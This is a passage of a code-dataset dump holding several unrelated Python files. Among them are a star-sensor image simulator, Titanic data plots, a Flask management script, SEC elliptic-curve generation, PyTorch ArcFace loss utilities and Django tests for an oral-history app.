ID\")\n\n #Converting to star sensor coordinate system\n ra_i = list(stars_within_FOV['RA'])\n de_i = list(stars_within_FOV['DE'])\n star_sensor_coordinates = []\n for i in range(len(ra_i)):\n coordinates = dir_vector_to_star_sensor(ra_i[i],de_i[i],M_transpose=M_transpose)\n star_sensor_coordinates.append(coordinates)\n\n #STEP 2: CONVERSION OF STAR SENSOR COORDINATE SYSTEM TO IMAGE COORDINATE SYSTEM\n star_loc = []\n for coord in star_sensor_coordinates:\n x = f*(coord[0]/coord[2])\n y = f*(coord[1]/coord[2])\n star_loc.append((x,y))\n\n xtot = 2*tan(radians(FOVx)/2)*f\n ytot = 2*tan(radians(FOVy)/2)*f\n xpixel = l/xtot\n ypixel = w/ytot\n\n magnitude_mv = list(stars_within_FOV['Magnitude'])\n filtered_magnitude = []\n\n #Rescaling to pixel sizes\n pixel_coordinates = []\n delete_indices = []\n for i,(x1,y1) in enumerate(star_loc):\n x1 = float(x1)\n y1 = float(y1)\n x1pixel = round(xpixel*x1)\n y1pixel = round(ypixel*y1)\n if abs(x1pixel) > l/2 or abs(y1pixel) > w/2:\n delete_indices.append(i)\n continue\n pixel_coordinates.append((x1pixel,y1pixel))\n filtered_magnitude.append(magnitude_mv[i])\n\n background = np.zeros((w,l))\n\n for i in range(len(filtered_magnitude)):\n x = round(l/2 + pixel_coordinates[i][0])\n y = round(w/2 - pixel_coordinates[i][1])\n background = draw_star(x,y,filtered_magnitude[i],False,background)\n\n #Adding noise\n background = add_noise(0,50,background=background)\n\n return background","sub_path":"nested_function.py","file_name":"nested_function.py","file_ext":"py","file_size_in_byte":7440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"255960052","text":"from pyglet.gl import *\r\n\r\nclass Pixels:\r\n def __init__(self, batch, position, color=None, group=None):\r\n self.group = group\r\n self.position = position\r\n self.length = int(len(position)/2)\r\n if not color:\r\n color = [255]*3*self.length\r\n self.color = color\r\n self.batch = batch\r\n self.vertex = None\r\n try:\r\n if position: self.draw()\r\n else: raise AttributeError\r\n except AttributeError:\r\n exit(f\"\"\"Program ends with AttributeError for object={self}:\r\n Pixels(batch={batch}, position={position}, color={color})\r\n Possible calls:\r\n Pixels(batch, position)\r\n color - 
optional, otherwise white-white\"\"\")\r\n \r\n def draw(self):\r\n self.vertex = self.batch.add(self.length, GL_POINTS, self.group,\r\n ('v2f', self.position), \r\n ('c3B', self.color))\r\n \r\n def update(self, points=None, position=None, color=None, add=False):\r\n if points and not position:\r\n if color: self.color = color\r\n elif position:\r\n if add:\r\n self.length += int(len(position)/2)\r\n self.position += position\r\n if color: self.color += color\r\n else: self.color += [255]*3*int(len(position)/2)\r\n else:\r\n self.length = int(len(position)/2)\r\n self.position = position\r\n if color: self.color = color\r\n if self.vertex:\r\n self.vertex.delete()\r\n self.vertex = None\r\n self.draw()\r\n \r\n def remove(self):\r\n self.vertex.delete()\r\n del self\r\n \r\n def hide(self):\r\n self.vertex.delete()","sub_path":"pixel_object.py","file_name":"pixel_object.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"347537813","text":"import pandas as pd\nimport numpy as np\nimport sklearn\nimport matplotlib.pyplot as plt\nfrom pylab import *\n\n\nif __name__ == '__main__':\n\n data_train = pd.read_csv('./data/train.csv')\n\n\n\n # #pic\n # mpl.rcParams['font.sans-serif'] = ['SimHei']\n # plt.rcParams['font.sans-serif'] = ['SimHei']\n # plt.rcParams['axes.unicode_minus']=True\n # fig = plt.figure()\n # fig.set(alpha = 1)\n\n # #data\n # plt.subplot2grid((2,3),(0,0))\n # data_train.Survived.value_counts().plot(kind=\"bar\")\n # plt.title(u\"survived\")\n\n # plt.subplot2grid((2,3),(0,1))\n # data_train.Pclass.value_counts().plot(kind=\"bar\")\n # plt.title(u'Pclass')\n\n # plt.subplot2grid((2,3),(0,2))\n # plt.scatter(data_train.Survived, data_train.Age)\n # plt.grid(b=True,which=\"major\",axis=\"y\")\n # plt.title(u'age by survived')\n\n # plt.subplot2grid((2,3),(1,0),colspan=2)\n # data_train.Age[data_train.Pclass == 1].plot(kind=\"kde\")\n # data_train.Age[data_train.Pclass == 2].plot(kind=\"kde\")\n # data_train.Age[data_train.Pclass == 3].plot(kind=\"kde\")\n # plt.xlabel(u'age')\n # plt.title('pclass by age')\n # plt.legend((u'1','2','3'),loc=\"best\")\n\n # plt.subplot2grid((2,3),(1,2))\n # data_train.Embarked.value_counts().plot(kind=\"bar\")\n # plt.title('people of embarked')\n\n # plt.show()\n\n fig = plt.figure()\n fig.set(alpha = 0.2)\n\n # #Pclass对获救的影响\n # Survived_0 = data_train.Pclass[data_train.Survived == 0].value_counts()\n # Survived_1 = data_train.Pclass[data_train.Survived == 1].value_counts()\n # df = pd.DataFrame({'survived': Survived_1,'not survived': Survived_0})\n # df.plot(kind=\"bar\")\n\n # #性别对获救的影响\n # Survived_m = data_train.Survived[data_train.Sex == 'male'].value_counts()\n # Survived_f = data_train.Survived[data_train.Sex == 'female'].value_counts()\n # df = pd.DataFrame({'survived_male': Survived_m, 'survived_female': Survived_f})\n # df.plot(kind=\"bar\")\n\n #各种舱位对应性别的生还\n ax1 = fig.add_subplot(161)\n data_train.Survived[data_train.Sex == 'female'][data_train.Pclass == 1].value_counts().plot(kind=\"bar\",label=\"female 1 class\", color=\"#FA2479\")\n ax1.set_xticklabels([u's',u'not s'],rotation= 0)\n ax1.legend([u'female/1'],loc=\"best\")\n\n ax2 = fig.add_subplot(162,sharey=ax1)\n data_train.Survived[data_train.Sex == 'female'][data_train.Pclass == 2].value_counts().plot(kind=\"bar\",label=\"female 2 class\", color=\"pink\")\n ax2.set_xticklabels([u's',u'not s'],rotation = 0)\n ax2.legend([u'female/2'],loc=\"best\")\n\n ax3 = 
fig.add_subplot(163,sharey=ax1)\n data_train.Survived[data_train.Sex == 'female'][data_train.Pclass == 3].value_counts().plot(kind=\"bar\",label=\"female 3 class\", color=\"pink\")\n print ( data_train.Survived[data_train.Sex == 'female'][data_train.Pclass == 3].value_counts())\n ax3.legend([u'female/3'],loc=\"best\")\n\n ax4 = fig.add_subplot(164,sharey=ax1)\n data_train.Survived[data_train.Sex == 'male'][data_train.Pclass == 1].value_counts().plot(kind=\"bar\",label=\"male 1 class\", color=\"red\")\n ax4.set_xticklabels([u'not s',u'not s'],rotation = 0)\n ax4.legend(['male/1'],loc=\"best\")\n\n\n ax5 = fig.add_subplot(165,sharey=ax1)\n data_train.Survived[data_train.Sex == 'male'][data_train.Pclass == 2].value_counts().plot(kind=\"bar\",label=\"male 2 class\", color=\"red\")\n ax5.set_xticklabels([u'not s',u' s'],rotation = 0)\n ax5.legend(['male/2'],loc=\"best\")\n\n\n ax6 = fig.add_subplot(166,sharey=ax1)\n data_train.Survived[data_train.Sex == 'male'][data_train.Pclass == 3].value_counts().plot(kind=\"bar\",label=\"male 3 class\", color=\"red\")\n ax6.set_xticklabels([u'not s',u' s'],rotation = 0)\n ax6.legend(['male/3'],loc=\"best\")\n plt.show()\n\n","sub_path":"Titanic/data_view.py","file_name":"data_view.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"532301140","text":"import os\r\nimport sys\r\nimport unittest\r\nimport datetime\r\nimport uuid\r\n\r\nfrom flask_migrate import Migrate, MigrateCommand\r\nfrom flask_script import Manager, Command\r\n\r\nfrom app.main import create_app, db\r\nfrom app.main.model.user import User\r\nfrom app.main.model.place import Place\r\nfrom app.main.model.review import Review\r\nfrom app import blueprint\r\n\r\nclass FlagManager(Manager):\r\n def command(self, capture_all=False):\r\n def decorator(func):\r\n command = Command(func)\r\n command.capture_all_args = capture_all\r\n self.add_command(func.__name__, command)\r\n\r\n return func\r\n return decorator\r\n\r\napp = create_app(os.getenv('BOILERPLATE_ENV') or 'dev')\r\napp.register_blueprint(blueprint)\r\napp.app_context().push()\r\nmanager = FlagManager(app)\r\nmigrate = Migrate(app, db)\r\nmanager.add_command('db', MigrateCommand)\r\n\r\n@manager.command()\r\ndef run():\r\n app.run(host='165.22.146.92', port=80)\r\n\r\n@manager.command()\r\ndef test():\r\n \"\"\"Runs the unit tests.\"\"\"\r\n tests = unittest.TestLoader().discover('app/test', pattern='test*.py')\r\n result = unittest.TextTestRunner(verbosity=2).run(tests)\r\n if result.wasSuccessful():\r\n return 0\r\n return 1\r\n\r\n@manager.command(True)\r\ndef create_admin(*args):\r\n\r\n if len(args[0]) < 2:\r\n print(\"Usage: python manage.py create_admin [user] [password] \")\r\n\r\n admin = User(\r\n public_id=str(uuid.uuid4()),\r\n email=\"admin\",\r\n username=sys.argv[2],\r\n password=sys.argv[3],\r\n admin= True,\r\n registered_on=datetime.datetime.utcnow()\r\n )\r\n\r\n\r\n \r\n db.session.add(admin) \r\n db.session.commit()\r\n\r\n@manager.command(True)\r\ndef create_mongodb_collections(*args):\r\n mongo.db.createCollection('places')\r\n\r\nif __name__ == '__main__':\r\n # Command.capture_all_args = True\r\n manager.run()\r\n\r\n","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"83775393","text":"import os\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom 
\nimport pandas as pd\nimport numpy as np\nfrom nltk.corpus import stopwords\nimport get_data\nimport re\nfrom tqdm import tqdm\n\nclass Bag_of_words():\n\n    def __init__(self, data):\n        self.data_reviews = data\n\n    def gen_bag_for_all(self):\n        clean_train_reviews = []\n        for r in tqdm(self.data_reviews):\n            clean_train_reviews.append(\" \".join(self.review_to_wordlist(r[\"reviewText\"], True)))\n        return clean_train_reviews\n\n\n    def train_bag(self, clean_train_reviews):\n        self.vectorizer = CountVectorizer(analyzer = \"word\",   \\\n                             tokenizer = None,    \\\n                             preprocessor = None, \\\n                             stop_words = None,   \\\n                             max_features = 5000)\n\n        self.train_data_features = self.vectorizer.fit_transform(clean_train_reviews)\n        self.train_data_features = self.train_data_features.toarray()\n\n        # vocab = self.vectorizer.get_feature_names()\n        # dist = np.sum(self.train_data_features, axis=0)\n        # for tag, count in zip(vocab, dist):\n        #     print count, tag\n\n        return self.train_data_features\n\n\n    def review_to_wordlist(self, review, remove_stopwords=False ):\n        review_text = re.sub(\"[^a-zA-Z\\-']\",\" \", review)\n        words = review_text.lower().split()\n        if remove_stopwords:\n            stops = set(stopwords.words(\"english\"))\n            words = [w for w in words if not w in stops]\n        return (words)\n","sub_path":"bag_of_words.py","file_name":"bag_of_words.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"179340306","text":"\"\"\" Implementation of the SEC standard, see\n    https://www.secg.org/sec2-v2.pdf\n    https://www.secg.org/sec1-v2.pdf\n\"\"\"\n\nfrom utils import sha1, SimulatedCurves\nfrom x962_gen import X962\nfrom sage.all import ZZ, floor, GF, Integer, EllipticCurve\n\n\ndef large_prime_factor(m: ZZ, bound: int):\n    \"\"\"Returns the bound-smooth cofactor h of m if h < bound and m // h is prime, otherwise False\"\"\"\n    h, prime = Integer(1), Integer(2)\n    tmp = m\n    while h < bound and prime < bound:\n        if tmp % prime == 0:\n            h *= prime\n            tmp = tmp // prime\n            continue\n        prime = prime.next_prime()\n    if h >= bound:\n        return False\n    if tmp.is_prime():\n        return h\n    return False\n\n\nclass SECG(X962):\n    def __init__(self, seed, p, cofactor_bound=4, cofactor_div=2):\n        super().__init__(seed, p, cofactor_bound, cofactor_div)\n        self._standard = \"secg\"\n        self._category = \"secg\"\n        self._embedding_degree_bound = 100\n\n    def order_check(self):\n        try:\n            cardinality = EllipticCurve(GF(self._p), [self._a, self._b]).__pari__().ellsea(self._cofactor_div)\n        except ArithmeticError:\n            return False\n        cardinality = Integer(cardinality)\n        if cardinality == 0:\n            return False\n        cofactor = large_prime_factor(cardinality, self._cofactor_bound)\n        self._cardinality = cardinality\n        if not cofactor:\n            return False\n        self._order, self._cofactor = cardinality // cofactor, cofactor\n        return True\n\n    def security(self):\n        super().security()\n        if not self._secure:\n            return\n        self._secure = False\n        n_1_bound = floor(self._order ** (1 - 19 / 20))\n        if not (large_prime_factor(self._order - 1, n_1_bound) and large_prime_factor(self._order + 1, n_1_bound)):\n            return\n        self._secure = True\n\n    def generate_generator(self):\n        \"\"\"Returns generator as specified in SEC, currently not using\"\"\"\n        c = 1\n        while True:\n            r = bytes(\"Base point\", 'ASCII') + bytes([1]) + bytes([c]) + bytes.fromhex(self.seed())\n            e = ZZ(sha1(r.hex()))\n            t = e % (2 * self._p)\n            x, z = t % self._p, t // self._p\n            c += 1\n            try:\n                y = self.curve().lift_x(x)[1]\n            except ValueError:\n                continue\n            if 
Integer(y) % 2 == z:\n return self.curve()(x, y) * self._cofactor\n\n\ndef generate_secg_curves(count, p, seed, cofactor_bound=4, cofactor_div=2):\n \"\"\"This is an implementation of the SEC standard suitable for large-scale simulations\n \"\"\"\n simulated_curves = SimulatedCurves(\"secg\", p.nbits(), seed, count)\n curve = SECG(seed, p, cofactor_bound=cofactor_bound, cofactor_div=cofactor_div)\n for _ in range(count):\n if not curve.secure():\n curve.seed_update()\n continue\n curve.compute_properties()\n simulated_curves.add_curve(curve)\n curve = SECG(curve.seed(), p, cofactor_div=cofactor_div, cofactor_bound=cofactor_bound)\n curve.seed_update()\n return simulated_curves\n","sub_path":"standards/secg_gen.py","file_name":"secg_gen.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"170923473","text":"#!/usr/bin/python3\n\n# detecting which elements are the same in two different lists:\n\nlist1=['A','C','F','Z','L']\nlist2=['K','C','L','Z','I']\n\n# using enumerate, comprehension list, and dict:\n\nfor positionList1, elementList1 in enumerate(list1):\n for match in [elementList2 for elementList2 in list2 if elementList2 == elementList1]:\n print ('Element: ', match, ' is in both lists')\n\n# What about getting sames values if only in same position/index:\n# using comprehension list, zip, and dict\n\noutputDict2={}\nfor positionList2 in (list2.index(y) for x, y in zip(list1, list2) if y == x):\n element = list2[positionList2]\n outputDict2.update( {positionList2 : element} )\n\nprint(\"outputDict2 : \")\nfor (key, value) in outputDict2.items() :\n print(key , \" :: \", value)\n\n","sub_path":"python_practices/exercise_lists_examples.py","file_name":"exercise_lists_examples.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"296779727","text":"import torch\nimport torch.nn as nn\n\nimport math\n\nimport config\n\n\n'''\nLOSSES\n'''\nclass Loss(nn.modules.Module):\n '''\n logits is output of the last layer of model\n '''\n def __init__(self, weight=None, size_average=None, reduce=None, reduction='none', pos_weight=None):\n super().__init__()\n self.weight = weight\n self.size_average = size_average\n self.reduce = reduce\n self.pos_weight = pos_weight\n self.reduction = reduction\n\nclass BCEWithLogitsLoss(Loss):\n def __init__(self, weight=None, size_average=None, reduce=None, reduction='none', pos_weight=None):\n super().__init__(weight, size_average, reduce, reduction, pos_weight)\n\n def forward(self, logits, targets):\n return nn.BCEWithLogitsLoss(reduction=self.reduction)(logits, targets.view(-1,1))\n\nclass ArcLoss(Loss):\n '''\n W = Weight at last layer\n x = last layer feature\n Z = logits\n logits = logits = Z = W*x = |W||x|cos(theta)\n normalised weights W and normalised features x sent here, |W|=1 |x|=1\n thus logits become cos(theta)\n\n MAKE SURE model logits takes care of above before using this loss\n '''\n def __init__(self, weight=None, size_average=None, reduce=None, reduction='none', pos_weight=None, feature_scale=30.0, margin=0.5):\n super().__init__(weight, size_average, reduce, reduction, pos_weight)\n self.feature_scale = feature_scale\n self.margin = margin\n self.margin_cos = math.cos(margin)\n self.margin_sin = math.sin(margin)\n self.th = math.cos(math.pi - margin)\n self.mm = math.sin(math.pi - margin) * margin\n\n def forward(self, logits, targets):\n '''\n logits = 
logits = cos(theta)\n margin added to theta cos(theta+margin)\n '''\n logits = logits.float()\n logits_to_sine = torch.sqrt(1 - torch.pow(logits, 2))\n logits_plus_margin = logits*self.margin_cos-logits_to_sine*self.margin_sin\n logits_plus_margin = torch.where(logits > self.th, logits_plus_margin, logits-self.mm)\n targets_onehot = torch.FloatTensor(targets.size(0), config.TARGET_SIZE+1).to(targets.device)\n targets_onehot.zero_()\n targets_onehot.scatter_(1, targets.view(-1,1).long(), 1)\n# print(targets_onehot)\n\n logits_plus_margin = (targets_onehot*logits_plus_margin)+((1-targets_onehot)*logits)\n\n logits_plus_margin *= self.feature_scale\n loss = torch.nn.CrossEntropyLoss(reduction=self.reduction)(logits_plus_margin, targets.long())\n \n return loss\n \n\n'''\nOPTIMIZER AND SCHEDULER\n'''\nclass OptSch:\n def __init__(self, sch=None, opt='Adam'):\n self.lr = config.INIT_LEARNING_RATE\n self.opt = opt\n self.sch = sch\n self.eta_min = config.ETA_MIN\n self.T_0 = config.T_0\n self.T_max=config.T_MAX\n \n def get_opt_sch(self, model):\n if self.opt=='Adam':\n optimizer = torch.optim.Adam(model.parameters(), lr = self.lr)\n \n if self.sch=='CosineAnnealingWarmRestarts':\n scheduler = torch.optim.lr_scheduler.CosineAnnealingWarmRestarts(optimizer,\n T_0 = self.T_0,\n eta_min = self.eta_min,\n last_epoch = -1)\n elif self.sch=='ReduceLROnPlateau':\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min',\n factor=config.FACTOR, patience=config.PATIENCE,\n verbose=True, eps=config.EPS)\n elif self.sch=='CosineAnnealingLR':\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer,\n T_max = self.T_max,\n eta_min = self.eta_min,\n last_epoch = -1)\n elif self.sch==None:\n scheduler=None\n return optimizer, scheduler\n","sub_path":"srcv2/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"612342961","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport datetime\n\nfrom django.contrib.admin.sites import AdminSite\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom django.test import TestCase\n# from urllib import urlencode\n\nfrom .models import Interview, OralHistory, Tag\nfrom .forms import OHPForm, TagForm, InterviewForm\nfrom .apps import OralHistoryConfig\nfrom .admin import TagAdmin, InterviewAdmin, OHPAdmin\n\nfrom project_share.models import Project, Application\nfrom django_teams.models import Team\n\n# Create your tests here.\n\n\nclass MockRequest(object):\n pass\n\n\nrequest = MockRequest()\n\n\nclass InterviewTestCase(TestCase):\n def setUp(self):\n self.tag_admin = TagAdmin(Tag, AdminSite())\n self.int_admin = InterviewAdmin(Interview, AdminSite())\n self.ohp_admin = OHPAdmin(OralHistory, AdminSite())\n self.user = get_user_model().objects.create_user(username='test-user',\n email='test@test.com',\n password='testpassword')\n self.ohp = OralHistory.objects.create(project_name=\"Test OHP\",\n byline=\"OHP Byline\",\n summary=\"OHP Summary\",\n slug=\"test-ohp\",\n is_official=True,\n approved=True,\n user=self.user)\n app = Application.objects.create(name=\"test_app\", application_type=\"OHP\")\n self.csdt = Project.objects.create(name=\"csdt_proj\", application=app)\n self.interview = Interview.objects.create(project=self.ohp,\n full_name=\"John Doe\",\n date=\"2018-11-11\",\n location=\"Troy, NY\",\n interview_by=\"Jane Doe\",\n birthplace=\"Anytown, USA\",\n 
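# fixture: one approved interview linked to the OHP project created above\n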
occupation=\"Worker\",\n birth_year=\"1960\",\n slug=\"john-doe\",\n approved=True,\n csdt_project=self.csdt,\n user=self.user)\n self.classroom = Team.objects.create()\n\n def test_unicode_models(self):\n self.assertEqual(self.interview.__unicode__(), \"Test OHP => John Doe by test-user\")\n self.assertEqual(self.ohp.__unicode__(), \"Project: Test OHP by test-user\")\n\n def test_ohp_views(self):\n url = '/oralhistory/test-ohp/'\n response = self.client.get(url, **{'HTTP_REFERER': url})\n self.assertTrue(response.status_code == 300 or response.status_code == 200,\n msg=\"Got code %s on %s\" % (response.status_code, url))\n url = '/oralhistory/test-ohp/john-doe'\n response = self.client.get(url, **{'HTTP_REFERER': url})\n self.assertTrue(response.status_code == 300 or response.status_code == 200,\n msg=\"Got code %s on %s\" % (response.status_code, url))\n # self.assertQuerysetEqual(OralHistory.objects.all(), )\n\n def test_interview_form(self):\n form_data = {\n 'full_name': \"Jane Doe\",\n 'date': '2011-11-11',\n 'location': 'Troy, NY',\n 'interview_by': 'Django',\n 'birthplace': 'New York',\n 'occupation': 'Teacher',\n 'birth_year': '1980',\n 'summary': 'Interview summary',\n 'user': self.user.pk,\n 'project': self.ohp.pk,\n 'classroom': self.classroom.pk,\n }\n form = InterviewForm(data=form_data)\n self.assertTrue(form.is_valid(), form.errors)\n int_form = form.save(commit=False)\n int_form.project = self.ohp\n int_form.csdt_project = self.csdt\n # team = Team.objects.get()\n # int_form.classroom = team\n form.save()\n int_form.save()\n self.assertEqual(int_form.summary, 'Interview summary')\n self.assertEqual(int_form.birth_year, '1980')\n self.assertEqual(int_form.occupation, 'Teacher')\n self.assertEqual(int_form.birthplace, 'New York')\n self.assertEqual(int_form.interview_by, 'Django')\n self.assertEqual(int_form.location, 'Troy, NY')\n self.assertEqual(int_form.date, datetime.date(2011, 11, 11))\n self.assertEqual(int_form.full_name, 'Jane Doe')\n self.assertEqual(int_form.slug, 'jane-doe')\n # test admin actions:\n queryset = Interview.objects.all()\n self.int_admin.actions[0](self.int_admin, request, queryset)\n self.assertTrue(Interview.objects.get(slug='jane-doe').approved)\n self.int_admin.actions[1](self.int_admin, request, queryset)\n self.assertFalse(Interview.objects.get(slug='jane-doe').approved)\n\n # test update view\n\n form_data2 = {\n 'full_name': \"Joe Doe\",\n 'date': '2018-10-10',\n 'location': 'Albany, NY',\n 'interview_by': 'Mr. Noone',\n 'birthplace': 'Mexico',\n 'occupation': 'Writer',\n 'birth_year': '1955',\n 'summary': 'Summary of Interview',\n 'user': self.user.pk,\n 'project': self.ohp.pk,\n 'classroom': self.classroom.pk,\n }\n self.assertTrue(self.client.login(username='test-user', password='testpassword'))\n\n response = self.client.post(reverse('oral_history:interview_update',\n kwargs={'slug': 'test-ohp',\n 'slug_interview': 'jane-doe'}),\n data=form_data2, follow=True)\n self.assertTrue(response.status_code == 200,\n msg=\"Got code %s\" % (response.status_code))\n\n self.assertContains(response, 'Thank you')\n\n self.assertEqual(Interview.objects.all().count(), 2)\n\n # test post form\n\n form_data2 = {\n 'full_name': \"Johnny Doe\",\n 'date': '2018-10-10',\n 'location': 'Albany, NY',\n 'interview_by': 'Mr. 
Noone',\n 'birthplace': 'Mexico',\n 'occupation': 'Writer',\n 'birth_year': '1955',\n 'summary': 'Summary of Interview',\n 'user': self.user.pk,\n 'project': self.ohp.pk,\n 'classroom': self.classroom.pk,\n }\n\n self.assertTrue(self.client.login(username='test-user', password='testpassword'))\n\n response = self.client.post(reverse('oral_history:interview_update',\n kwargs={'slug': 'test-ohp',\n 'slug_interview': 'joe-doe',\n }),\n data=form_data2, follow=True)\n\n def test_oralhistory_form(self):\n form_data = {\n 'is_official': False,\n 'project_name': 'test-OHP-2',\n 'byline': 'new oralhistory project',\n 'summary': 'ohp summary',\n 'slug': 'test-ohp-2',\n 'user': self.user.pk}\n form = OHPForm(data=form_data)\n self.assertTrue(form.is_valid(), form.errors)\n ohp_form = form.save()\n self.assertEqual(ohp_form.summary, 'ohp summary')\n self.assertEqual(ohp_form.byline, 'new oralhistory project')\n self.assertEqual(ohp_form.slug, 'test-ohp-2')\n self.assertEqual(ohp_form.project_name, 'test-OHP-2')\n self.assertEqual(ohp_form.approved, False)\n self.assertEqual(ohp_form.is_official, False)\n self.assertEqual(ohp_form.user, self.user)\n # test admin actions:\n queryset = OralHistory.objects.all()\n self.ohp_admin.actions[0](self.ohp_admin, request, queryset)\n self.assertTrue(OralHistory.objects.get(slug='test-ohp-2').approved)\n self.ohp_admin.actions[1](self.ohp_admin, request, queryset)\n self.assertFalse(OralHistory.objects.get(slug='test-ohp-2').approved)\n\n form_data2 = {\n 'is_official': False,\n 'project_name': 'test-OHP-3',\n 'byline': 'new oralhistory project',\n 'summary': 'ohp summary',\n 'slug': 'test-ohp-3',\n 'user': self.user.pk}\n self.assertTrue(self.client.login(username='test-user', password='testpassword'))\n\n response = self.client.post(reverse('oral_history:upload_ohp'),\n data=form_data2, follow=True)\n self.assertTrue(response.status_code == 200,\n msg=\"Got code %s\" % (response.status_code))\n # print response.content\n\n self.assertContains(response, 'Thank you')\n\n self.assertEqual(OralHistory.objects.all().count(), 3)\n\n form_data2 = {\n 'is_official': False,\n 'project_name': 'test-OHP-4',\n 'byline': 'new oralhistory project',\n 'summary': 'ohp summary',\n 'slug': 'test-ohp-4',\n }\n response = self.client.post(reverse('oral_history:upload_ohp'),\n data=form_data2, follow=True)\n self.assertTrue(response.status_code == 200,\n msg=\"Got code %s\" % (response.status_code))\n self.assertContains(response, 'error')\n self.assertEqual(OralHistory.objects.all().count(), 3)\n\n # test the update form view\n form_data2 = {\n 'is_official': False,\n 'project_name': 'test-OHP-3',\n 'byline': 'new oralhistory project',\n 'summary': 'ohp summary',\n 'slug': 'test-ohp-3',\n 'user': self.user.pk,\n }\n self.assertTrue(self.client.login(username='test-user', password='testpassword'))\n\n response = self.client.post(reverse('oral_history:update_ohp',\n kwargs={'slug': 'test-ohp-3',\n }),\n data=form_data2, follow=True)\n self.assertTrue(response.status_code == 200,\n msg=\"Got code %s\" % (response.status_code))\n\n self.assertContains(response, 'Thank you')\n\n self.assertEqual(OralHistory.objects.all().count(), 3)\n\n def test_tag_form(self):\n interv = Interview.objects.get(slug=\"john-doe\")\n # Interview.objects.get(slug='john-doe')\n form_data = {'hours': 0,\n 'mins': 1,\n 'secs': 25,\n 'tag': 'talks about the city',\n 'honeypot': '',\n 'approved': True}\n form = TagForm(data=form_data)\n self.assertTrue(form.is_valid(), form.errors)\n tag_form = 
form.save(commit=False)\n tag_form.timestamp = datetime.timedelta(seconds=85)\n tag_form.approved = True\n tag_form.interview = interv\n form.save()\n tag_form.save()\n self.assertEqual(tag_form.tag, 'talks about the city')\n self.assertEqual(tag_form.timestamp, datetime.timedelta(seconds=85))\n self.assertEqual(tag_form.interview, self.interview)\n self.assertEqual(tag_form.approved, True)\n self.assertEqual(tag_form.__unicode__(),\n \"Tag: Test OHP: John Doe => \\\"talks about the city\\\", 00:01:25\")\n self.assertEqual(tag_form.to_timestamp(), \"00:01:25\")\n tag_form.timestamp = datetime.timedelta(seconds=3601)\n tag_form.save()\n self.assertEqual(tag_form.to_timestamp(), \"01:00:01\")\n # test honeypot\n form_data2 = {'hours': 0,\n 'mins': 1,\n 'secs': 25,\n 'tag': 'talks about the city',\n 'honeypot': 'male',\n 'approved': True}\n form2 = TagForm(data=form_data2)\n with self.assertRaises(ValueError):\n form2.save()\n self.assertEqual(Tag.objects.filter(\n tag='talks about the city').count(), 1)\n # test admin:\n queryset = Tag.objects.filter(pk=1)\n self.tag_admin.actions[0](self.tag_admin, request, queryset)\n self.assertTrue(Tag.objects.get(pk=1).approved)\n self.tag_admin.actions[1](self.tag_admin, request, queryset)\n self.assertFalse(Tag.objects.get(pk=1).approved)\n\n form_data3 = {'hours': 0,\n 'mins': 1,\n 'secs': 26,\n 'tag': 'talks about the city',\n 'honeypot': '',\n 'approved': True}\n\n response = self.client.post(reverse('oral_history:interview',\n kwargs={'slug': self.ohp.slug,\n 'slug_interview': interv.slug}),\n data=form_data3, follow=True)\n self.assertTrue(response.status_code == 200,\n msg=\"Got code %s\" % (response.status_code))\n\n self.assertContains(response, 'Thank you')\n self.assertEqual(Tag.objects.all().count(), 2)\n\n form_data4 = {'hours': 0,\n 'mins': 1,\n 'secs': 26,\n 'tag': 'talks about the city',\n 'honeypot': 'shouldnt be here',\n 'approved': True}\n # self.assertTrue(self.client.login(username='test-user', password='testpassword'))\n\n response = self.client.post(reverse('oral_history:interview',\n kwargs={'slug': self.ohp.slug,\n 'slug_interview': interv.slug}),\n data=form_data4, follow=True)\n self.assertTrue(response.status_code == 200,\n msg=\"Got code %s\" % (response.status_code))\n\n self.assertContains(response, 'error')\n self.assertEqual(Tag.objects.all().count(), 2)\n\n # logged in auto approves\n self.assertTrue(self.client.login(username='test-user', password='testpassword'))\n form_data5 = {'hours': 0,\n 'mins': 1,\n 'secs': 27,\n 'tag': 'talks about the city',\n 'honeypot': '',\n 'approved': True}\n\n response = self.client.post(reverse('oral_history:interview',\n kwargs={'slug': self.ohp.slug,\n 'slug_interview': interv.slug}),\n data=form_data5, follow=True)\n self.assertTrue(response.status_code == 200,\n msg=\"Got code %s\" % (response.status_code))\n self.assertContains(response, 'Thank you')\n self.assertEqual(Tag.objects.all().count(), 3)\n\n def test_uploadinterview_post_form(self):\n pass\n\n def test_apps(self):\n self.assertEqual(OralHistoryConfig.name, 'oral_history')\n # self.assertEqual(apps.get_app_config('oral_history').name, 'oral_history')\n","sub_path":"oral_history/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":15426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"232977775","text":"#%%\nimport re\nWORD_SPLIT = re.compile(\",\")\ntarget = \"i,have,a,dream.\"\nwords = 
